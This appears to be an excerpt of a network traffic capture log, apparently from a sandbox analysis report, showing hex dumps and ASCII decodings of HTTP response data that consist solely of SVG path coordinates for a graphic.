32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: " d="M731.81,304.77A1.73,1.73,0,0,1,731,307a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11867INData Raw: 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11883INData Raw: 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 38 38 2c 32 39 36 2e 31 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38
                                                                                                                                                                                                                                                                          Data Ascii: 1-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M780.88,296.17a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M78
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11899INData Raw: 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 37 33 2c 31 39 38 2e 33 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.15,2.86"></path><path class="cls-4" d="M798.73,198.39a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11915INData Raw: 64 3d 22 4d 38 33 30 2e 31 39 2c 32 39 34 2e 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 35 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: d="M830.19,294.5a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.95,2.38,2.38,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11931INData Raw: 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: .72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11948INData Raw: 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11964INData Raw: 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 37 2e 31 32 2c 31 38 38 2e 31 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M897.12,188.12a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11980INData Raw: 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 35 38 2c 32 38 34 2e 32 33 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 11,0,0,1,.15,2.85"></path><path class="cls-4" d="M928.58,284.23a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11996INData Raw: 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                          Data Ascii: .69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12012INData Raw: 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12028INData Raw: 2e 35 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: .59a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12044INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 35 39 2c 32 32 37 2e 35 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: th><path class="cls-4" d="M959.59,227.54a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12060INData Raw: 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 30 36 2c 31 34 36 2e 35 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32
                                                                                                                                                                                                                                                                          Data Ascii: 08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.06,146.54a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12796INData Raw: 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2c 32 35 36 2e 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912,256.5a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12812INData Raw: 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: ,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12828INData Raw: 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 7-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12844INData Raw: 2d 34 22 20 64 3d 22 4d 38 33 33 2e 35 36 2c 31 39 37 2e 36 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c
